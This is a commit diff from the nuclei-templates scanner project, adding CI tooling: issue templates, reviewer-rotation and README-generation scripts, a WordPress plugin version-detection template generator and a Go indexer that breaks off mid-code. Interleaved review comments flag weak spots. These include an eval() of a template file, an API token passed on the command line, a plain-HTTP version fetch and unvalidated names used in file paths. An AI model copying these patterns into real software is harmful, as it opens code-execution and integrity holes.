parent
d3c7d73554
commit
129fae0047
|
@ -0,0 +1,14 @@
|
||||||
|
blank_issues_enabled: false
|
||||||
|
|
||||||
|
contact_links:
|
||||||
|
- name: Ask an question / advise on using nuclei-templates
|
||||||
|
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
|
||||||
|
about: Ask a question or request support for using nuclei-templates
|
||||||
|
|
||||||
|
- name: Share idea / feature to discuss for nuclei-templates
|
||||||
|
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||||
|
about: Share idea / feature to discuss for nuclei-templates
|
||||||
|
|
||||||
|
- name: Connect with PD Team & Community (Discord)
|
||||||
|
url: https://discord.gg/projectdiscovery
|
||||||
|
about: Connect with PD Team & Community for direct communication
|
|
@ -0,0 +1,21 @@
|
||||||
|
---
|
||||||
|
name: False Negative
|
||||||
|
about: 'Issue for template missing valid/expected result.'
|
||||||
|
labels: 'false-negative'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Nuclei Version:
|
||||||
|
|
||||||
|
<!-- You can find current version of nuclei with "nuclei -version" -->
|
||||||
|
|
||||||
|
### Template file:
|
||||||
|
|
||||||
|
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||||
|
|
||||||
|
### Command to reproduce:
|
||||||
|
|
||||||
|
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
|
||||||
|
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
|
|
@ -0,0 +1,24 @@
|
||||||
|
---
|
||||||
|
name: False Positive
|
||||||
|
about: 'Issue for template producing invalid/unexpected result.'
|
||||||
|
labels: 'false-positive'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Nuclei Version:
|
||||||
|
|
||||||
|
<!-- You can find current version of nuclei with "nuclei -version" -->
|
||||||
|
|
||||||
|
### Template file:
|
||||||
|
|
||||||
|
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||||
|
|
||||||
|
### Command to reproduce:
|
||||||
|
|
||||||
|
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
|
||||||
|
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
|
||||||
|
|
||||||
|
### Anything else:
|
||||||
|
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -0,0 +1,18 @@
|
||||||
|
---
|
||||||
|
name: Feature request
|
||||||
|
about: Request feature to implement in this project
|
||||||
|
labels: 'Type: Enhancement'
|
||||||
|
---
|
||||||
|
|
||||||
|
<!--
|
||||||
|
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
|
||||||
|
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
|
||||||
|
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||||
|
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
|
||||||
|
-->
|
||||||
|
|
||||||
|
### Please describe your feature request:
|
||||||
|
<!-- A clear and concise description of feature to implement -->
|
||||||
|
|
||||||
|
### Describe the use case of this feature:
|
||||||
|
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->
|
|
@ -0,0 +1,21 @@
|
||||||
|
---
|
||||||
|
name: Issue report
|
||||||
|
about: "Issue to report invalid template"
|
||||||
|
labels: 'Type: Bug'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!--
|
||||||
|
1. Please search to see if an issue already exists for the bug you encountered.
|
||||||
|
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
|
||||||
|
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
|
||||||
|
-->
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
### Issue description:
|
||||||
|
<!-- A concise description of what you're experiencing. -->
|
||||||
|
|
||||||
|
|
||||||
|
### Anything else:
|
||||||
|
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -0,0 +1,17 @@
|
||||||
|
---
|
||||||
|
name: Template Request
|
||||||
|
about: 'request for new template to be created.'
|
||||||
|
labels: 'new-template'
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||||
|
|
||||||
|
|
||||||
|
### Template for?
|
||||||
|
|
||||||
|
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
|
||||||
|
|
||||||
|
### Details:
|
||||||
|
|
||||||
|
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->
|
|
@ -0,0 +1,23 @@
|
||||||
|
---
|
||||||
|
name: Template Contribution
|
||||||
|
about: Contributing nuclei template using GitHub Issue
|
||||||
|
labels: 'nuclei-template'
|
||||||
|
---
|
||||||
|
|
||||||
|
### Template Information:
|
||||||
|
|
||||||
|
<!-- Include basic information of the template including reference -->
|
||||||
|
<!-- Templates without any reference mostly likely to take more time for review/validation -->
|
||||||
|
|
||||||
|
|
||||||
|
### Nuclei Template:
|
||||||
|
|
||||||
|
<!-- Include nuclei template in between code block shared below -->
|
||||||
|
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
<!-- Include template results if available or redacted valid response snippet of valid match -->
|
||||||
|
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Set to true to add reviewers to pull requests
|
||||||
|
addReviewers: false
|
||||||
|
|
||||||
|
# Set to true to add assignees to pull requests
|
||||||
|
addAssignees: false
|
||||||
|
|
||||||
|
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||||
|
reviewers:
|
||||||
|
- ritikchaddha
|
||||||
|
- pussycat0x
|
||||||
|
- DhiyaneshGeek
|
||||||
|
|
||||||
|
# A number of reviewers added to the pull request
|
||||||
|
# Set 0 to add all the reviewers (default: 0)
|
||||||
|
numberOfReviewers: 1
|
||||||
|
|
||||||
|
# A list of assignees, overrides reviewers if set
|
||||||
|
assignees:
|
||||||
|
- pussycat0x
|
||||||
|
- ritikchaddha
|
||||||
|
- DhiyaneshGeek
|
||||||
|
|
||||||
|
# A number of assignees to add to the pull request
|
||||||
|
# Set to 0 to add all of the assignees.
|
||||||
|
# Uses numberOfReviewers if unset.
|
||||||
|
numberOfAssignees: 1
|
||||||
|
|
||||||
|
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||||
|
# skipKeywords:
|
||||||
|
# - wip
|
|
@ -0,0 +1,19 @@
|
||||||
|
# To get started with Dependabot version updates, you'll need to specify which
|
||||||
|
# package ecosystems to update and where the package manifests are located.
|
||||||
|
# Please see the documentation for all configuration options:
|
||||||
|
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
|
||||||
|
|
||||||
|
version: 2
|
||||||
|
updates:
|
||||||
|
|
||||||
|
# Maintain dependencies for GitHub Actions
|
||||||
|
- package-ecosystem: "github-actions"
|
||||||
|
directory: "/"
|
||||||
|
schedule:
|
||||||
|
interval: "weekly"
|
||||||
|
target-branch: "main"
|
||||||
|
commit-message:
|
||||||
|
prefix: "chore"
|
||||||
|
include: "scope"
|
||||||
|
labels:
|
||||||
|
- "Type: Maintenance"
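Review bot: The `updates` list covers only the `github-actions` ecosystem, so the exact-pinned Python requirements added elsewhere in this commit (`requests==2.28.1`, `urllib3==1.26.13`, `certifi==2023.7.22`, …) will never receive update PRs. Consider a second entry with `package-ecosystem: "pip"` and a `directory:` pointing at the folder that holds that requirements file (its path is not visible on this page). Several workflows in this commit also reference actions by branch (`@master`), which Dependabot does not bump; a version tag or full commit SHA gives it something to update.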
|
|
@ -1,4 +1,4 @@
|
||||||
|
f"""
|
||||||
|
|
||||||
<h1 align="center">
|
<h1 align="center">
|
||||||
Nuclei Templates
|
Nuclei Templates
|
||||||
|
@ -38,22 +38,9 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
<tr>
|
<tr>
|
||||||
<td>
|
<td>
|
||||||
|
|
||||||
## Nuclei Templates Top 10 statistics
|
{get_top10()}
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
**{command("tree", -2, None)}**.
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|
||||||
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
|
||||||
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
|
||||||
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
|
||||||
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
|
||||||
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
|
||||||
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
|
||||||
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
|
||||||
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
|
||||||
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
|
||||||
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
|
||||||
|
|
||||||
**534 directories, 7902 files**.
|
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
@ -94,3 +81,4 @@ Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be
|
||||||
|
|
||||||
|
|
||||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||||
|
"""
|
|
@ -0,0 +1,139 @@
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
|
||||||
|
# GitHub credentials
|
||||||
|
password = sys.argv[3]
|
||||||
|
|
||||||
|
repo_owner = "projectdiscovery"
|
||||||
|
repo_name = "nuclei-templates"
|
||||||
|
pr_user_list = ["DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||||
|
issue_user_list = ["princechaddha", "DhiyaneshGeek", "pussycat0x", "ritikchaddha"]
|
||||||
|
|
||||||
|
headers = {'Authorization': f'Bearer {password}',
|
||||||
|
'Accept': 'application/vnd.github+json',
|
||||||
|
'X-GitHub-Api-Version': '2022-11-28'}
|
||||||
|
|
||||||
|
def get_issue_assignee(issue_number):
|
||||||
|
issue_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues?per_page=2"
|
||||||
|
response = requests.get(issue_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
issue_data = response.json()[1]
|
||||||
|
assignee = issue_data["assignee"]["login"] if issue_data["assignee"] else "None"
|
||||||
|
return assignee
|
||||||
|
else:
|
||||||
|
print(f"Failed to fetch assignee for issue #{issue_number}")
|
||||||
|
return None
|
||||||
|
|
||||||
|
def assign_issue_or_pr(user, issue_number):
|
||||||
|
url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues/{issue_number}/assignees"
|
||||||
|
data = { "assignees": [user] }
|
||||||
|
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||||
|
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f"Assigned issue #{issue_number} to {user}")
|
||||||
|
else:
|
||||||
|
print(f"Failed to assign issue #{issue_number} to {user}. Status code: {response.status_code}")
|
||||||
|
|
||||||
|
def get_pr_assignee_and_reviewer(pull_request_number):
|
||||||
|
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls?per_page=2'
|
||||||
|
response = requests.get(pull_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
pull_request_data = response.json()[1]
|
||||||
|
assignee = pull_request_data['assignee']['login'] if pull_request_data['assignee'] else None
|
||||||
|
reviewers = [reviewer['login'] for reviewer in pull_request_data['requested_reviewers']]
|
||||||
|
|
||||||
|
return assignee, reviewers
|
||||||
|
else:
|
||||||
|
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
return None, None
|
||||||
|
|
||||||
|
def get_pr_author(pull_request_number):
|
||||||
|
pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}'
|
||||||
|
response = requests.get(pull_url, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
pull_request_data = response.json()
|
||||||
|
author = pull_request_data['user']['login']
|
||||||
|
return author
|
||||||
|
|
||||||
|
else:
|
||||||
|
print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
return None
|
||||||
|
|
||||||
|
def review_pr(user, pull_request_number):
|
||||||
|
url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}/requested_reviewers'
|
||||||
|
data = { 'reviewers': [user] }
|
||||||
|
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||||
|
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f"Review request for pull request #{pull_request_number} sent to {user} successfully.")
|
||||||
|
else:
|
||||||
|
print(f"Failed to send review request for pull request #{pull_request_number}. Response: {response.text}")
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) != 4:
|
||||||
|
print("Usage: python assign_tasks.py <issue_number> <pr_or_issue> <token>")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
issue_number = int(sys.argv[1])
|
||||||
|
type_ = sys.argv[2]
|
||||||
|
if type_ == 'pr':
|
||||||
|
assignee, reviewers = get_pr_assignee_and_reviewer(issue_number - 1)
|
||||||
|
author = get_pr_author(issue_number)
|
||||||
|
|
||||||
|
if reviewers:
|
||||||
|
try:
|
||||||
|
index = pr_user_list.index(reviewers[0])
|
||||||
|
try:
|
||||||
|
reviewer = pr_user_list[index + 1]
|
||||||
|
except:
|
||||||
|
reviewer = pr_user_list[0]
|
||||||
|
if reviewer == author:
|
||||||
|
reviewer = pr_user_list(pr_user_list.index(reviewer) + 1)
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
else:
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
reviewer = pr_user_list[0]
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
else:
|
||||||
|
for user in pr_user_list:
|
||||||
|
if (user != author):
|
||||||
|
reviewer = user
|
||||||
|
review_pr(reviewer, issue_number)
|
||||||
|
break
|
||||||
|
|
||||||
|
if assignee:
|
||||||
|
try:
|
||||||
|
index = pr_user_list.index(assignee)
|
||||||
|
if (pr_user_list[index + 1] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[index + 2], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[index + 1], issue_number)
|
||||||
|
except Exception as e:
|
||||||
|
if (pr_user_list[0] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||||
|
else:
|
||||||
|
if (pr_user_list[0] == reviewer):
|
||||||
|
assign_issue_or_pr(pr_user_list[1], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(pr_user_list[0], issue_number)
|
||||||
|
elif type_ == 'issue':
|
||||||
|
assignee = get_issue_assignee(issue_number-1)
|
||||||
|
|
||||||
|
if assignee:
|
||||||
|
try:
|
||||||
|
index = issue_user_list.index(assignee)
|
||||||
|
assign_issue_or_pr(issue_user_list[index + 1], issue_number)
|
||||||
|
except Exception as e:
|
||||||
|
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||||
|
else:
|
||||||
|
assign_issue_or_pr(issue_user_list[0], issue_number)
|
||||||
|
|
||||||
|
main()
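Review bot: The API token is read from the command line at import time (`password = sys.argv[3]`), which places the secret in the process argument list and raises IndexError before `main()` can print its usage message when an argument is missing. Reading it from an environment variable set on the workflow step, e.g. `password = os.environ["ASSIGN_TOKEN"]` (variable name illustrative, needs `import os`), avoids both. Separately, `reviewer = pr_user_list(pr_user_list.index(reviewer) + 1)` calls the list instead of indexing it; the TypeError is swallowed by `except Exception` and the fallback `pr_user_list[0]` can be the PR author again, so `pr_user_list[(pr_user_list.index(reviewer) + 1) % len(pr_user_list)]` is probably what was intended. `get_issue_assignee` and `get_pr_assignee_and_reviewer` ignore their argument and read `response.json()[1]`, which fails when fewer than two items come back, and none of the `requests` calls pass a `timeout`.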
|
|
@ -0,0 +1,23 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
import glob
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
def countTpl(path):
|
||||||
|
return len(glob.glob(path + "/*.*"))
|
||||||
|
|
||||||
|
def command(args, start=None, end=None):
|
||||||
|
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
|
||||||
|
|
||||||
|
def get_top10():
|
||||||
|
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
|
||||||
|
TOP10 = command(["cat", "TOP-10.md"])
|
||||||
|
return HEADER + TOP10 if len(TOP10) > 0 else ""
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
version = command(["git", "describe", "--tags", "--abbrev=0"])
|
||||||
|
template = eval(open(".github/scripts/README.tmpl", "r").read())
|
||||||
|
|
||||||
|
print(template)
|
||||||
|
f = open("README.md", "w")
|
||||||
|
f.write(template)
|
||||||
|
f.close()
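Review bot: `template = eval(open(".github/scripts/README.tmpl", "r").read())` executes the template file as Python, so any expression placed in README.tmpl runs with whatever credentials the calling workflow holds. If the template only needs a few substituted values, compute them in this script and fill them in with `string.Template(...).substitute(...)` or `str.format`, so the template is data rather than code; at minimum add a comment above the `eval` stating that README.tmpl must be reviewed as executable code. The file handles are also not closed on error; `with open("README.md", "w") as f:` handles that.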
|
|
@ -0,0 +1,10 @@
|
||||||
|
beautifulsoup4==4.11.1
|
||||||
|
bs4==0.0.1
|
||||||
|
certifi==2023.7.22
|
||||||
|
charset-normalizer==2.1.1
|
||||||
|
idna==3.4
|
||||||
|
Markdown==3.4.1
|
||||||
|
requests==2.28.1
|
||||||
|
soupsieve==2.3.2.post1
|
||||||
|
termcolor==2.1.1
|
||||||
|
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
'''
|
||||||
|
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||||
|
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||||
|
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||||
|
compares the detect version with the payload version.
|
||||||
|
|
||||||
|
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||||
|
|
||||||
|
e.g.
|
||||||
|
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||||
|
'''
|
||||||
|
|
||||||
|
__author__ = "ricardomaia"
|
||||||
|
|
||||||
|
from time import sleep
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
from markdown import markdown
|
||||||
|
import os
|
||||||
|
from termcolor import colored, cprint
|
||||||
|
|
||||||
|
# Regex to extract the name of th plugin from the URL
|
||||||
|
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||||
|
|
||||||
|
ranking = 1
|
||||||
|
|
||||||
|
# Top 200 Wordpress Plugins
|
||||||
|
for page_number in range(1, 11):
|
||||||
|
|
||||||
|
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||||
|
"Accept-Language": "en-US,en;q=0.9",
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Connection": "keep-alive",
|
||||||
|
"Upgrade-Insecure-Requests": "1",
|
||||||
|
"Cache-Control": "max-age=0",
|
||||||
|
"Pragma": "no-cache",
|
||||||
|
}).content
|
||||||
|
|
||||||
|
# Parse HTML
|
||||||
|
soup = BeautifulSoup(html, 'html.parser')
|
||||||
|
results = soup.find(id="main")
|
||||||
|
articles = results.find_all("article", class_="plugin-card")
|
||||||
|
|
||||||
|
# Setting the top tag
|
||||||
|
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||||
|
|
||||||
|
# Get each plugin in the page
|
||||||
|
for article in articles:
|
||||||
|
|
||||||
|
full_title = article.find("h3", class_="entry-title").get_text()
|
||||||
|
regex_remove_quotes = r"[\"`:]"
|
||||||
|
subst_remove_quotes = "'"
|
||||||
|
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||||
|
|
||||||
|
link = article.find("a").get("href")
|
||||||
|
name = re.search(regex, link).group(1)
|
||||||
|
|
||||||
|
cprint(f"Title: {title}", "cyan")
|
||||||
|
cprint(f"Link: {link}", "yellow")
|
||||||
|
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||||
|
print(f"Page Number: {page_number}")
|
||||||
|
print(f"Top Tag: {top_tag}")
|
||||||
|
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||||
|
ranking += 1
|
||||||
|
|
||||||
|
sleep(0.2)
|
||||||
|
|
||||||
|
# Get the readme.txt file from SVN
|
||||||
|
readme = requests.get(
|
||||||
|
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||||
|
headers={
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||||
|
"Cache-Control": "no-cache",
|
||||||
|
"Connection": "keep-alive",
|
||||||
|
"Host": "plugins.svn.wordpress.org",
|
||||||
|
"Pragma": "no-cache",
|
||||||
|
"Upgrade-Insecure-Requests": "1",
|
||||||
|
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||||
|
|
||||||
|
# Extract the plugin version
|
||||||
|
try:
|
||||||
|
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||||
|
readme.decode("utf-8")).group(1)
|
||||||
|
except:
|
||||||
|
version = "N/A"
|
||||||
|
|
||||||
|
# Extract the plugin description
|
||||||
|
try:
|
||||||
|
description_markdown = re.search(
|
||||||
|
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||||
|
html = markdown(description_markdown)
|
||||||
|
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||||
|
regex_max_length = r"(\b.{80}\b)"
|
||||||
|
subst_max_lenght = "\\g<1>\\n "
|
||||||
|
description = re.sub(
|
||||||
|
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||||
|
except:
|
||||||
|
description = "N/A"
|
||||||
|
|
||||||
|
print(f"Version: {version}")
|
||||||
|
print(f"Description: {description}")
|
||||||
|
|
||||||
|
# Write the plugin template to file
|
||||||
|
template = f'''id: wordpress-{name}
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: {title} Detection
|
||||||
|
author: ricardomaia
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/{name}/
|
||||||
|
metadata:
|
||||||
|
plugin_namespace: {name}
|
||||||
|
wpscan: https://wpscan.com/plugin/{name}
|
||||||
|
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
last_version: helpers/wordpress/plugins/{name}.txt
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
name: internal_detected_version
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: detected_version
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
name: "outdated_version"
|
||||||
|
dsl:
|
||||||
|
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
|
'''
|
||||||
|
|
||||||
|
work_dir = os.getcwd()
|
||||||
|
print(f"Current working directory: {work_dir}")
|
||||||
|
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||||
|
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||||
|
|
||||||
|
if not os.path.exists(helper_dir):
|
||||||
|
os.makedirs(helper_dir)
|
||||||
|
|
||||||
|
if not os.path.exists(template_dir):
|
||||||
|
os.makedirs(template_dir)
|
||||||
|
|
||||||
|
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||||
|
version_file = open(helper_path, "w")
|
||||||
|
version_file.write(version)
|
||||||
|
version_file.close()
|
||||||
|
|
||||||
|
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||||
|
template_file = open(template_path, "w") # Dev environment
|
||||||
|
template_file.write(template)
|
||||||
|
template_file.close()
|
||||||
|
|
||||||
|
print("--------------------------------------------")
|
||||||
|
print("\n")
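Review bot: The readme that supplies the version written to `helpers/wordpress/plugins/{name}.txt` is fetched over plain HTTP (`http://plugins.svn.wordpress.org/{name}/trunk/readme.txt`), so the "Stable tag" value that later drives the `outdated_version` matcher has no transport integrity; use `https://` for that URL. `name` comes from `re.search(regex, link).group(1)` with the pattern `(\w.+)`, which also matches `/` and `..`, and is then used in file paths and in the generated YAML without a check; validating it first with something like `if not re.fullmatch(r"[a-z0-9][a-z0-9-]*", name): continue` keeps writes inside the two target directories. The `Referer` header string is missing its `f` prefix, so the literal text `{name}` is sent. The bare `except:` blocks hide decode and response-shape errors behind "N/A", and `description` is computed but never written into the template.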
|
|
@ -0,0 +1,108 @@
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"fmt"
|
||||||
|
"io/ioutil"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"gopkg.in/yaml.v3"
|
||||||
|
)
|
||||||
|
|
||||||
|
type Classification struct {
|
||||||
|
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type Info struct {
|
||||||
|
Name string `yaml:"name"`
|
||||||
|
Severity string `yaml:"severity"`
|
||||||
|
Description string `yaml:"description"`
|
||||||
|
Classification Classification `yaml:"classification,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
type Data struct {
|
||||||
|
ID string `yaml:"id"`
|
||||||
|
Info Info `yaml:"info"`
|
||||||
|
FilePath string `json:"file_path"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
if len(os.Args) != 3 {
|
||||||
|
fmt.Println("Usage: go run main.go <directory1[,directory2,...]> <output_file>")
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
|
||||||
|
input := os.Args[1]
|
||||||
|
outputFile := os.Args[2]
|
||||||
|
var directories []string
|
||||||
|
|
||||||
|
// Check if the input contains a comma
|
||||||
|
if strings.Contains(input, ",") {
|
||||||
|
directories = strings.Split(input, ",")
|
||||||
|
} else {
|
||||||
|
directories = []string{input}
|
||||||
|
}
|
||||||
|
|
||||||
|
var data []Data
|
||||||
|
|
||||||
|
for _, directory := range directories {
|
||||||
|
fmt.Println("Generating data for", directory)
|
||||||
|
|
||||||
|
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error accessing path %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||||
|
yamlFile, err := ioutil.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
var d Data
|
||||||
|
err = yaml.Unmarshal(yamlFile, &d)
|
||||||
|
if err != nil {
|
||||||
|
